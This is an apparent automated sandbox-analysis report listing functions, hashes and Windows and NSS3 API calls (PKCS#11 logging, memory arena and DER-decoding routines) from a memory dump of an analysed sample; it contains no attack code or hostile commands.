security, xrefs: 6CF8ED06

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: ArenaPool$CallFinishFreeOnceUtil$CriticalDecodeEnterErrorFindInitItem_QuickSectionUnlockValuefree
String ID: security
API String ID: 3323615905-3315324353
Opcode ID: a94e086fd344a589427a58d20459b9ba08940eea3c4d8edf05e01062fb8c9b3c
Instruction ID: 754dbc5e75f8031320c2e11b78720b366f696ba4f6aa87a19af28c43fada62e0
Opcode Fuzzy Hash: a94e086fd344a589427a58d20459b9ba08940eea3c4d8edf05e01062fb8c9b3c
Instruction Fuzzy Hash: 6011353B901204BBF62057A5AC40BBBB278AF4260CF044435EC2566A82E720AA1D86E7

Function 6CF72CD0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 73COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_InitToken), ref: 6CF72CEC
PR_LogPrint.NSS3( slotID = 0x%x,?), ref: 6CF72D07

Part of subcall function 6D0509D0: PR_Now.NSS3 ref: 6D050A22
Part of subcall function 6D0509D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6D050A35
Part of subcall function 6D0509D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6D050A66
Part of subcall function 6D0509D0: PR_GetCurrentThread.NSS3 ref: 6D050A70
Part of subcall function 6D0509D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6D050A9D
Part of subcall function 6D0509D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6D050AC8
Part of subcall function 6D0509D0: PR_vsmprintf.NSS3(?,?), ref: 6D050AE8
Part of subcall function 6D0509D0: EnterCriticalSection.KERNEL32(?), ref: 6D050B19
Part of subcall function 6D0509D0: OutputDebugStringA.KERNEL32(00000000), ref: 6D050B48
Part of subcall function 6D0509D0: _PR_MD_UNLOCK.NSS3(?), ref: 6D050C76
Part of subcall function 6D0509D0: PR_LogFlush.NSS3 ref: 6D050C7E

PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6CF72D22

Part of subcall function 6D0509D0: OutputDebugStringA.KERNEL32(?), ref: 6D050B88
Part of subcall function 6D0509D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6D050C5D
Part of subcall function 6D0509D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6D050C8D
Part of subcall function 6D0509D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6D050C9C
Part of subcall function 6D0509D0: OutputDebugStringA.KERNEL32(?), ref: 6D050CD1
Part of subcall function 6D0509D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6D050CEC
Part of subcall function 6D0509D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6D050CFB
Part of subcall function 6D0509D0: OutputDebugStringA.KERNEL32(00000000), ref: 6D050D16
Part of subcall function 6D0509D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6D050D26
Part of subcall function 6D0509D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6D050D35
Part of subcall function 6D0509D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6D050D65
Part of subcall function 6D0509D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6D050D70
Part of subcall function 6D0509D0: _PR_MD_UNLOCK.NSS3(?), ref: 6D050D90
Part of subcall function 6D0509D0: free.MOZGLUE(00000000), ref: 6D050D99

PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6CF72D3B

Part of subcall function 6D0509D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6D050BAB
Part of subcall function 6D0509D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6D050BBA
Part of subcall function 6D0509D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6D050D7E

PR_LogPrint.NSS3( pLabel = 0x%p,?), ref: 6CF72D54

Part of subcall function 6D0509D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6D050BCB
Part of subcall function 6D0509D0: EnterCriticalSection.KERNEL32(?), ref: 6D050BDE
Part of subcall function 6D0509D0: OutputDebugStringA.KERNEL32(?), ref: 6D050C16

Strings

pPin = 0x%p, xrefs: 6CF72D1D
slotID = 0x%x, xrefs: 6CF72D02
pLabel = 0x%p, xrefs: 6CF72D4F
C_InitToken, xrefs: 6CF72CE7
ulPinLen = %d, xrefs: 6CF72D36

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: DebugOutputString$Printfflush$fwrite$CriticalEnterR_snprintfSection$CurrentExplodeFlushR_vsmprintfR_vsnprintfThreadTimefputcfreememcpystrlen
String ID: pLabel = 0x%p$ pPin = 0x%p$ slotID = 0x%x$ ulPinLen = %d$C_InitToken
API String ID: 420000887-1567254798
Opcode ID: 812a30a3a87c0aac329f6b28056c036cf0a810bd8efd6baa72bd38398a505e6a
Instruction ID: f8feee3b2cddc42423c6f9ced1fda2b07a0f00fb4a7abc4d16314b23d0946cbf
Opcode Fuzzy Hash: 812a30a3a87c0aac329f6b28056c036cf0a810bd8efd6baa72bd38398a505e6a
Instruction Fuzzy Hash: D321B676504104EFEB209B66EE58B5E3BB1EB4231DF484026FA0897223DB719854CB71

Function 6CFB4DB0 Relevance: 16.9, APIs: 11, Instructions: 395memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000400), ref: 6CFB4DCB

Part of subcall function 6CFA0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CF487ED,00000800,6CF3EF74,00000000), ref: 6CFA1000
Part of subcall function 6CFA0FF0: PR_NewLock.NSS3(?,00000800,6CF3EF74,00000000), ref: 6CFA1016
Part of subcall function 6CFA0FF0: PL_InitArenaPool.NSS3(00000000,security,6CF487ED,00000008,?,00000800,6CF3EF74,00000000), ref: 6CFA102B

PORT_ArenaAlloc_Util.NSS3(00000000,0000001C), ref: 6CFB4DE1

Part of subcall function 6CFA10C0: TlsGetValue.KERNEL32(?,6CF48802,00000000,00000008,?,6CF3EF74,00000000), ref: 6CFA10F3
Part of subcall function 6CFA10C0: EnterCriticalSection.KERNEL32(?,?,6CF48802,00000000,00000008,?,6CF3EF74,00000000), ref: 6CFA110C
Part of subcall function 6CFA10C0: PL_ArenaAllocate.NSS3(?,?,?,6CF48802,00000000,00000008,?,6CF3EF74,00000000), ref: 6CFA1141
Part of subcall function 6CFA10C0: PR_Unlock.NSS3(?,?,?,6CF48802,00000000,00000008,?,6CF3EF74,00000000), ref: 6CFA1182
Part of subcall function 6CFA10C0: TlsGetValue.KERNEL32(?,6CF48802,00000000,00000008,?,6CF3EF74,00000000), ref: 6CFA119C

PORT_ArenaAlloc_Util.NSS3(?,0000001C), ref: 6CFB4DFF
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CFB4E59

Part of subcall function 6CF9FAB0: free.MOZGLUE(?,-00000001,?,?,6CF3F673,00000000,00000000), ref: 6CF9FAC7

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6D07300C,00000000), ref: 6CFB4EB8
SECOID_FindOID_Util.NSS3(?), ref: 6CFB4EFF
memcmp.VCRUNTIME140(?,00000000,00000000), ref: 6CFB4F56
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CFB521A

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: Util$Arena$Alloc_Arena_Item_Value$AllocateCriticalDecodeEnterFindFreeInitLockPoolQuickSectionUnlockZfreecallocfreememcmp
String ID:
API String ID: 1025791883-0
Opcode ID: 1922246f5b33255c6269909b5da05afee58a1b7edd4cf26009a104d2c151918a
Instruction ID: 5ec11fe24ef2f3de6bab3d1caf67dee59dde16a6c1fbd718eca1ecf32f7d7f41
Opcode Fuzzy Hash: 1922246f5b33255c6269909b5da05afee58a1b7edd4cf26009a104d2c151918a
Instruction Fuzzy Hash: 3EF17B71E0020ACBDB04CF56D8407AEBBB2FF49358F258169E915BB781E775E981CB90

Function 6CFB0C60 Relevance: 16.7, APIs: 11, Instructions: 153memoryCOMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(6CFB2C2A), ref: 6CFB0C81

Part of subcall function 6CF9BE30: SECOID_FindOID_Util.NSS3(6CF5311B,00000000,?,6CF5311B,?), ref: 6CF9BE44

Part of subcall function 6CF88500: SECOID_GetAlgorithmTag_Util.NSS3(6CF895DC,00000000,00000000,00000000,?,6CF895DC,00000000,00000000,?,6CF67F4A,00000000,?,00000000,00000000), ref: 6CF88517

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CFB0CC4

Part of subcall function 6CF9FAB0: free.MOZGLUE(?,-00000001,?,?,6CF3F673,00000000,00000000), ref: 6CF9FAC7

SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6CFB0CD5
PORT_ZAlloc_Util.NSS3(0000101C), ref: 6CFB0D1D
PK11_GetBlockSize.NSS3(-00000001,00000000), ref: 6CFB0D3B
PK11_CreateContextBySymKey.NSS3(-00000001,00000104,?,00000000), ref: 6CFB0D7D
free.MOZGLUE(00000000), ref: 6CFB0DB5
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CFB0DC1
free.MOZGLUE(00000000), ref: 6CFB0DF7
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CFB0E05
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6CFB0E0F

Part of subcall function 6CF895C0: SECOID_FindOIDByTag_Util.NSS3(00000000,?,00000000,?,6CF67F4A,00000000,?,00000000,00000000), ref: 6CF895E0
Part of subcall function 6CF895C0: PK11_GetIVLength.NSS3(?,?,?,00000000,?,6CF67F4A,00000000,?,00000000,00000000), ref: 6CF895F5
Part of subcall function 6CF895C0: SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6CF89609
Part of subcall function 6CF895C0: SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6CF8961D
Part of subcall function 6CF895C0: PK11_GetInternalSlot.NSS3 ref: 6CF8970B
Part of subcall function 6CF895C0: PK11_FreeSymKey.NSS3(00000000), ref: 6CF89756
Part of subcall function 6CF895C0: PK11_GetIVLength.NSS3(?), ref: 6CF89767
Part of subcall function 6CF895C0: SECITEM_DupItem_Util.NSS3(00000000), ref: 6CF8977E
Part of subcall function 6CF895C0: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CF8978E

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: Util$K11_$Tag_$Item_$FindZfree$Algorithmfree$ContextLength$Alloc_BlockCreateDestroyFreeInternalSizeSlot
String ID:
API String ID: 3136566230-0
Opcode ID: 3d3044d366f353eba908538e4cf0d40d5d841f04efd546a9714b78c475d98d13
Instruction ID: adeb7d2b4c620c10a121a3b69dd31be6a23e32acecd8e2a2a4da5f8a85ec8471
Opcode Fuzzy Hash: 3d3044d366f353eba908538e4cf0d40d5d841f04efd546a9714b78c475d98d13
Instruction Fuzzy Hash: 1E41B0F5901246ABEB009F66DD45BEF7674AF0430CF100128E9156BB81EB75EA58CBE2

Function 6CF5FCA0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 99stringmemoryCOMMON

Download Yara Rule

APIs

PK11_IsInternalKeySlot.NSS3(?,?,00000000,?), ref: 6CF5FCBD
strchr.VCRUNTIME140(?,0000003A,?,?,00000000,?), ref: 6CF5FCCC
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,00000000,?), ref: 6CF5FCEF
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CF5FD32
PORT_ArenaAlloc_Util.NSS3(00000000,00000001), ref: 6CF5FD46
PORT_Alloc_Util.NSS3(00000001), ref: 6CF5FD51
memcpy.VCRUNTIME140(00000000,00000000,-00000001), ref: 6CF5FD6D
memcpy.VCRUNTIME140(00000000,?,?), ref: 6CF5FD84

Strings

:, xrefs: 6CF5FD78

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: Alloc_Utilmemcpystrlen$ArenaInternalK11_Slotstrchr
String ID: :
API String ID: 183580322-336475711
Opcode ID: 6b01cbbeec5e53cf722db012dedf94c099d5da7b2fd0114ccdec8c6525f24190
Instruction ID: 46aaf7b0f69f4620d6dac12934511d4a2b7d191b0bc54108f6fae6f734e1115b
Opcode Fuzzy Hash: 6b01cbbeec5e53cf722db012dedf94c099d5da7b2fd0114ccdec8c6525f24190
Instruction Fuzzy Hash: 223125B6D0020A9BEB408BA4DD05BAFB7A8EF60318F550175DE14E7700E771EA24C7D2

Function 6CF76C40 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 87COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DigestInit), ref: 6CF76C66
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CF76C94
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CF76CA3

Part of subcall function 6D05D930: PL_strncpyz.NSS3(?,?,?), ref: 6D05D963

PR_LogPrint.NSS3(?,00000000), ref: 6CF76CB9
PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6CF76CD5

Strings

(CK_INVALID_HANDLE), xrefs: 6CF76C9C
hSession = 0x%x, xrefs: 6CF76C7E, 6CF76C8E
C_DigestInit, xrefs: 6CF76C61
pMechanism = 0x%p, xrefs: 6CF76CD0

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pMechanism = 0x%p$ (CK_INVALID_HANDLE)$C_DigestInit
API String ID: 1003633598-3690128261
Opcode ID: ac586920a8fcc78288c5532628076588f099a8eec92076f56eef8f1e8d80393c
Instruction ID: 8bb8e88dfb11bd67b070f70c40380622b70083241e61e0b1cb22017086032df7
Opcode Fuzzy Hash: ac586920a8fcc78288c5532628076588f099a8eec92076f56eef8f1e8d80393c
Instruction Fuzzy Hash: A521E931905114ABEB209B26EE54F5F37B5EB42319F494036F90D97643DB309948C7B1

Function 6CF79DD0 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 85COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_SessionCancel), ref: 6CF79DF6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CF79E24
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CF79E33

Part of subcall function 6D05D930: PL_strncpyz.NSS3(?,?,?), ref: 6D05D963

PR_LogPrint.NSS3(?,00000000), ref: 6CF79E49
PR_LogPrint.NSS3( flags = 0x%x,?), ref: 6CF79E65

Strings

(CK_INVALID_HANDLE), xrefs: 6CF79E2C
hSession = 0x%x, xrefs: 6CF79E0E, 6CF79E1E
flags = 0x%x, xrefs: 6CF79E60
C_SessionCancel, xrefs: 6CF79DF1

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: flags = 0x%x$ hSession = 0x%x$ (CK_INVALID_HANDLE)$C_SessionCancel
API String ID: 1003633598-1678415578
Opcode ID: 84516ab1e93e9d0fddfb8e0033abcff1e65e6ffb91ec11c50a7704b8a8178ed8
Instruction ID: db92b715e131c45c904f1f9bdfcbbdef6e9b2b987db8392276e4c28660d3fa68
Opcode Fuzzy Hash: 84516ab1e93e9d0fddfb8e0033abcff1e65e6ffb91ec11c50a7704b8a8178ed8
Instruction Fuzzy Hash: 7321D671505118AFEB209B25ED94FAF37B5EB4630DF494026E90DA7253DF309944CBB2

Function 6CF46DB0 Relevance: 15.2, APIs: 10, Instructions: 200memoryCOMMON

Download Yara Rule

APIs

SECITEM_ArenaDupItem_Util.NSS3(?,6CF47D8F,6CF47D8F,?,?), ref: 6CF46DC8

Part of subcall function 6CF9FDF0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6CF9FE08
Part of subcall function 6CF9FDF0: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6CF9FE1D
Part of subcall function 6CF9FDF0: memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6CF9FE62

PORT_ArenaAlloc_Util.NSS3(?,00000010,?,?,6CF47D8F,?,?), ref: 6CF46DD5

Part of subcall function 6CFA10C0: TlsGetValue.KERNEL32(?,6CF48802,00000000,00000008,?,6CF3EF74,00000000), ref: 6CFA10F3
Part of subcall function 6CFA10C0: EnterCriticalSection.KERNEL32(?,?,6CF48802,00000000,00000008,?,6CF3EF74,00000000), ref: 6CFA110C
Part of subcall function 6CFA10C0: PL_ArenaAllocate.NSS3(?,?,?,6CF48802,00000000,00000008,?,6CF3EF74,00000000), ref: 6CFA1141
Part of subcall function 6CFA10C0: PR_Unlock.NSS3(?,?,?,6CF48802,00000000,00000008,?,6CF3EF74,00000000), ref: 6CFA1182
Part of subcall function 6CFA10C0: TlsGetValue.KERNEL32(?,6CF48802,00000000,00000008,?,6CF3EF74,00000000), ref: 6CFA119C

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6D068FA0,00000000,?,?,?,?,6CF47D8F,?,?), ref: 6CF46DF7

Part of subcall function 6CF9B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6D0718D0,?), ref: 6CF9B095

SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6CF46E35

Part of subcall function 6CF9FDF0: PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6CF9FE29
Part of subcall function 6CF9FDF0: PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6CF9FE3D
Part of subcall function 6CF9FDF0: free.MOZGLUE(00000000,?,?,?,?), ref: 6CF9FE6F

PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6CF46E4C

Part of subcall function 6CFA10C0: PL_ArenaAllocate.NSS3(?,6CF48802,00000000,00000008,?,6CF3EF74,00000000), ref: 6CFA116E

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6D068FE0,00000000), ref: 6CF46E82

Part of subcall function 6CF46AF0: SECITEM_ArenaDupItem_Util.NSS3(00000000,6CF4B21D,00000000,00000000,6CF4B219,?,6CF46BFB,00000000,?,00000000,00000000,?,?,?,6CF4B21D), ref: 6CF46B01
Part of subcall function 6CF46AF0: SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,00000000), ref: 6CF46B8A

SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6CF46F1E
PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6CF46F35
SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6D068FE0,00000000), ref: 6CF46F6B
PR_SetError.NSS3(FFFFE005,00000000,6CF47D8F,?,?), ref: 6CF46FE1

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: Util$Arena$Item_$Alloc_$DecodeQuick$AllocateErrorValue$CriticalEnterSectionUnlockfreememcpy
String ID:
API String ID: 587344769-0
Opcode ID: a914c5d66803ee5fb0857e7fba3695aaf6a3451fdccf518b576f3ac9075a8d0e
Instruction ID: f86cf604bf199b570b37e33d9608a3b6f543994cddc277512c57000f2cdd9fbf
Opcode Fuzzy Hash: a914c5d66803ee5fb0857e7fba3695aaf6a3451fdccf518b576f3ac9075a8d0e
Instruction Fuzzy Hash: F0719271D106469FEB04CF55CD40BAABBA4BF94318F15822AF858D7B12F770E994CB90

Function 6CF8ADC0 Relevance: 15.1, APIs: 10, Instructions: 148COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,6CF6CDBB,?,6CF6D079,00000000,00000001), ref: 6CF8AE10
EnterCriticalSection.KERNEL32(?,?,6CF6CDBB,?,6CF6D079,00000000,00000001), ref: 6CF8AE24
PR_Unlock.NSS3(?,?,?,?,?,?,6CF6D079,00000000,00000001), ref: 6CF8AE5A
memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6CF6CDBB,?,6CF6D079,00000000,00000001), ref: 6CF8AE6F
free.MOZGLUE(85145F8B,?,?,?,?,6CF6CDBB,?,6CF6D079,00000000,00000001), ref: 6CF8AE7F
TlsGetValue.KERNEL32(?,6CF6CDBB,?,6CF6D079,00000000,00000001), ref: 6CF8AEB1
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6CF6CDBB,?,6CF6D079,00000000,00000001), ref: 6CF8AEC9
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6CF6CDBB,?,6CF6D079,00000000,00000001), ref: 6CF8AEF1
free.MOZGLUE(6CF6CDBB,?,?,?,?,?,?,?,?,?,?,?,?,?,6CF6CDBB,?), ref: 6CF8AF0B
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6CF6CDBB,?,6CF6D079,00000000,00000001), ref: 6CF8AF30

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: Unlock$CriticalEnterSectionValuefree$memset
String ID:
API String ID: 161582014-0
Opcode ID: f94458a0f03fb5bd364f9276afa04d700a4046acedfaa4859c7d0d8dafb06089
Instruction ID: 27967107d45d3881d5d2373cf8781855c9774bf40ceaaa307e3445b824b3befa
Opcode Fuzzy Hash: f94458a0f03fb5bd364f9276afa04d700a4046acedfaa4859c7d0d8dafb06089
Instruction Fuzzy Hash: 99518EB5902A02AFDB01DF25D884B9AB7B4FF08318F144665E8189BE51E731F864CBE1

Function 6CF64CA0 Relevance: 15.1, APIs: 10, Instructions: 142COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,00000000,00000000,?,6CF6AB7F,?,00000000,?), ref: 6CF64CB4
EnterCriticalSection.KERNEL32(0000001C,?,6CF6AB7F,?,00000000,?), ref: 6CF64CC8
TlsGetValue.KERNEL32(?,6CF6AB7F,?,00000000,?), ref: 6CF64CE0
EnterCriticalSection.KERNEL32(?,?,6CF6AB7F,?,00000000,?), ref: 6CF64CF4
PL_HashTableLookup.NSS3(?,?,?,6CF6AB7F,?,00000000,?), ref: 6CF64D03
PR_Unlock.NSS3(?,00000000,?), ref: 6CF64D10

Part of subcall function 6CFEDD70: TlsGetValue.KERNEL32 ref: 6CFEDD8C
Part of subcall function 6CFEDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CFEDDB4
